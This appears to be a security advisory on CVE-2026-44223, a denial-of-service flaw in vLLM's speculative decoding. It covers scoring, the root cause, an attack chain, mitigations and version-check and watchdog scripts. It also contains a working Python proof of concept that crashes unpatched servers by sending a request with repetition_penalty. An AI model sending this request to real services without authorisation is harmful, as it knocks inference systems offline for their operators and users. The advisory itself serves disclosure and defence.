CVE-2026-44223: Denial-of-Service Vulnerability in the vLLM Inference Engine

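Vulnerability information

CVE ID: CVE-2026-44223
Type: Denial of service
CVSS score: 6.5 (Medium)
Attack vector: Network (AV:N)
Privileges required: Low (PR:L)
User interaction: None (UI:N)
Affected product: vLLM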
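
The 6.5 score can be reproduced from the CVSS v3.1 base formula. The sketch below is a worked calculation, not an official vector: the advisory lists only AV:N, PR:L and UI:N, so the remaining metrics (AC:L, S:U, C:N, I:N, A:H) are assumptions chosen because they fit an availability-only denial of service and yield the listed score.

```python
import math

# CVSS v3.1 metric weights (only the values needed here).
AV_NETWORK = 0.85        # AV:N, stated in the advisory
PR_LOW_UNCHANGED = 0.62  # PR:L with unchanged scope, PR:L stated in the advisory
UI_NONE = 0.85           # UI:N, stated in the advisory
AC_LOW = 0.77            # ASSUMPTION: AC:L is not stated in the advisory
CONF_NONE = 0.0          # ASSUMPTION: C:N
INTEG_NONE = 0.0         # ASSUMPTION: I:N
AVAIL_HIGH = 0.56        # ASSUMPTION: A:H


def roundup(value):
    """Round up to one decimal place as defined in the CVSS v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score_scope_unchanged(av, ac, pr, ui, c, i, a):
    """CVSS v3.1 base score for the scope-unchanged case (S:U, assumed here)."""
    iss = 1 - (1 - c) * (1 - i) * (1 - a)
    impact = 6.42 * iss
    exploitability = 8.22 * av * ac * pr * ui
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


score = base_score_scope_unchanged(
    AV_NETWORK, AC_LOW, PR_LOW_UNCHANGED, UI_NONE,
    CONF_NONE, INTEG_NONE, AVAIL_HIGH,
)
print(score)
```

Under these assumptions the impact term is about 3.60 and the exploitability term about 2.84, which rounds up to 6.5.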

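Overview

vLLM is a high-performance engine for large language model inference and serving. Versions before 0.20.0 contain a serious flaw in the speculative decoding feature. When any request in a batch uses a sampling penalty parameter (such as repetition_penalty), the extract_hidden_states proposer returns a tensor with the wrong dimensions after the first decode step. This raises a RuntimeError that crashes the EngineCore process. An attacker with low-privilege access to the API can cause a denial of service by sending a single request that includes a penalty parameter.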

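Technical details

The root cause is a defect in how vLLM manages tensor shapes while handling speculative decoding requests. In versions before 0.20.0, when a batch contains any request that uses a sampling penalty parameter (for example repetition_penalty, frequency_penalty or presence_penalty), the internal extract_hidden_states proposer fails to compute or maintain the correct output tensor dimensions after the first decode step. The returned tensor no longer matches the shape that downstream components expect, which raises a RuntimeError. Because the error is not adequately caught, it terminates the EngineCore process that performs model inference. The attacker does not need high privileges: sending a crafted API request over the network is enough to trigger the crash and take the service offline.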
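
The failure mode described above (a shape mismatch surfacing as an uncaught RuntimeError) can be illustrated with a toy model. This is not vLLM code and not the upstream fix; the function names and the shapes are hypothetical, and plain tuples stand in for tensor shapes so the sketch runs without any dependencies.

```python
def consume_draft(shape, expected_shape):
    """Hypothetical downstream component that requires a fixed tensor shape."""
    if tuple(shape) != tuple(expected_shape):
        raise RuntimeError(
            f"shape mismatch: got {tuple(shape)}, expected {tuple(expected_shape)}"
        )
    return "ok"


def run_step_unguarded(shape, expected_shape):
    """The exception propagates to the caller; in a worker loop this ends the process."""
    return consume_draft(shape, expected_shape)


def run_step_guarded(shape, expected_shape):
    """The exception is contained, so only the affected batch fails."""
    try:
        return consume_draft(shape, expected_shape)
    except RuntimeError as exc:
        return f"batch failed: {exc}"


# Hypothetical shapes: the downstream code expects (2, 1) but receives (2, 3).
print(run_step_guarded((2, 1), (2, 1)))
print(run_step_guarded((2, 3), (2, 1)))
```

Containing the exception only limits the blast radius in this toy; the actual remedy for the vulnerability is the corrected shape handling shipped in 0.20.0.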

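Attack chain analysis

Step 1: Reconnaissance
The attacker identifies a target running an affected vLLM version (earlier than 0.20.0).

Step 2: Craft the request
The attacker prepares a malicious API request that includes a sampling penalty parameter (such as repetition_penalty).

Step 3: Send the request
The attacker sends the request to the inference endpoint of the vLLM server.

Step 4: Trigger the vulnerability
While the server processes the request, the extract_hidden_states component returns a tensor with the wrong shape, which raises a RuntimeError.

Step 5: Denial of service
The EngineCore process crashes on the exception and the inference service becomes unavailable, completing the DoS attack.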
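
Since the chain above hinges on the penalty parameters introduced in step 2, one conceivable stopgap is to drop those fields at an API gateway before requests reach an unpatched server. The sketch below is an assumption-laden illustration, not a mitigation named by the advisory: strip_penalties is a hypothetical helper, it has not been verified against the actual bug, and it silently changes sampling behaviour for legitimate clients.

```python
# Penalty parameters named in the advisory's technical details.
PENALTY_KEYS = ("repetition_penalty", "frequency_penalty", "presence_penalty")


def strip_penalties(payload):
    """Return a copy of a request body without penalty fields, plus the removed keys.

    Hypothetical gateway-side helper. It only inspects top-level keys, so
    penalties supplied through any other route would not be caught.
    """
    removed = [key for key in PENALTY_KEYS if key in payload]
    cleaned = {key: value for key, value in payload.items() if key not in PENALTY_KEYS}
    return cleaned, removed


request_body = {
    "prompt": "Hello",
    "max_tokens": 16,
    "repetition_penalty": 1.1,
}
cleaned, removed = strip_penalties(request_body)
print(cleaned)
print(removed)
```

Returning the removed keys lets the gateway log or reject such requests instead of silently rewriting them, which may be preferable when clients depend on penalty settings.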

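PoC / Exploit code

⚠️ For security research only

The following code is intended solely for security research and authorized testing. Unauthorized use is illegal.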

import requests

# PoC for CVE-2026-44223
# Target: vLLM server versions < 0.20.0
# Description: This script sends a request with a repetition_penalty parameter
# to trigger the tensor shape mismatch bug in the speculative decoding proposer.


def check_vulnerability(target_url):
    endpoint = f"{target_url}/v1/completions"

    # Payload containing the sampling penalty parameter that triggers the crash
    payload = {
        "model": "meta-llama/Llama-2-7b-chat-hf",  # Example model name
        "prompt": "Explain this vulnerability.",
        "max_tokens": 50,
        # The presence of 'repetition_penalty' triggers the incorrect tensor shape
        "repetition_penalty": 1.1,
    }

    try:
        print(f"[*] Sending payload to {endpoint}...")
        # json= serializes the payload and sets the Content-Type header
        response = requests.post(endpoint, json=payload, timeout=10)

        # If the server crashes, the connection might be reset or return a 500 error
        if response.status_code in (500, 502):
            print(f"[+] Potential vulnerability triggered! Server returned error code: {response.status_code}")
        elif "RuntimeError" in response.text or "Internal Server Error" in response.text:
            print("[+] Vulnerability likely triggered. RuntimeError detected in response.")
        else:
            print("[-] Request completed. Server might be patched or not vulnerable.")
            print("Response status:", response.status_code)

    except requests.exceptions.ConnectionError:
        print("[+] Connection error. The EngineCore process may have crashed (DoS).")
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")


if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost:8000"
    check_vulnerability(target)

Affected versions

vLLM < 0.20.0
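
To check an environment against this range, the installed version can be compared with the fixed release. The sketch below is a minimal example that assumes vLLM was installed under the distribution name vllm; it compares only the numeric release segment, so a pre-release such as 0.20.0rc1 would be reported as not affected and should be reviewed by hand.

```python
import re
from importlib import metadata

FIXED_VERSION = (0, 20, 0)  # first fixed release according to the advisory


def release_tuple(version):
    """Extract the leading numeric release segment, e.g. '0.19.1.post1' -> (0, 19, 1)."""
    match = re.match(r"\d+(?:\.\d+)*", version.strip().lstrip("vV"))
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def is_affected(version):
    """Return True if the given version is earlier than the fixed release."""
    release = release_tuple(version)
    padded = release + (0,) * (len(FIXED_VERSION) - len(release))
    return padded < FIXED_VERSION


def installed_vllm_is_affected():
    """Check the locally installed package; returns None if vllm is not installed."""
    try:
        return is_affected(metadata.version("vllm"))
    except metadata.PackageNotFoundError:
        return None


print(installed_vllm_is_affected())
```

The comparison uses integer tuples rather than strings so that 0.9.x sorts before 0.20.0.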

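Defense guide

Remediation and temporary mitigations

Upgrade vLLM to 0.20.0 or later as soon as possible, which fully fixes this vulnerability. If you cannot upgrade immediately, restrict network access to the vLLM service port with a firewall or security group so that only trusted internal IP addresses can call the API. In addition, deploy a process monitoring script that checks the health of the EngineCore process and automatically restarts the service when a crash is detected, to minimize the impact on the business.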
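
The monitoring script mentioned above could look roughly like the following. It is a sketch under stated assumptions: the server is assumed to expose an HTTP health endpoint (the /health path and the systemd unit name in the usage comment are placeholders), and the restart action is supplied by the operator. A watchdog only shortens downtime; an attacker can crash the service again until the upgrade is applied.

```python
import time
import urllib.error
import urllib.request


def is_healthy(url, timeout=5.0):
    """Return True if the health URL answers with HTTP 200 within the timeout."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status == 200
    except (urllib.error.URLError, OSError):
        return False


def watch(probe, restart, interval=10.0, failures_before_restart=3, max_checks=None):
    """Poll probe(); call restart() after several consecutive failures.

    Runs forever when max_checks is None. Returns the number of restarts issued.
    """
    consecutive_failures = 0
    restarts = 0
    checks = 0
    while max_checks is None or checks < max_checks:
        checks += 1
        if probe():
            consecutive_failures = 0
        else:
            consecutive_failures += 1
            if consecutive_failures >= failures_before_restart:
                restart()
                restarts += 1
                consecutive_failures = 0
        time.sleep(interval)
    return restarts


# Example wiring (placeholders, adjust to the deployment):
#   import subprocess
#   watch(
#       probe=lambda: is_healthy("http://localhost:8000/health"),
#       restart=lambda: subprocess.run(["systemctl", "restart", "vllm"], check=False),
#   )
```

Requiring several consecutive failures before restarting avoids bouncing the service on a single slow response, and passing the probe and restart actions as callables keeps the loop testable without a live server.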